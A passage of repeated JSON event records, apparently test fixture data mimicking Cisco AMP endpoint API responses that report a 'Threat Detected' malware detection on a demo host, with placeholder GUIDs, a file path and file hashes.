Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163586","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":395000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163585","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":317000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":317000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":208000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":208000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163578","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":192000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163577","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":192000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163576","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":145000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163575","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":145000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163574","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163573","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163572","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163571","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163570","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163568","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163567","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":83000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163566","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":67000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163565","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":67000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
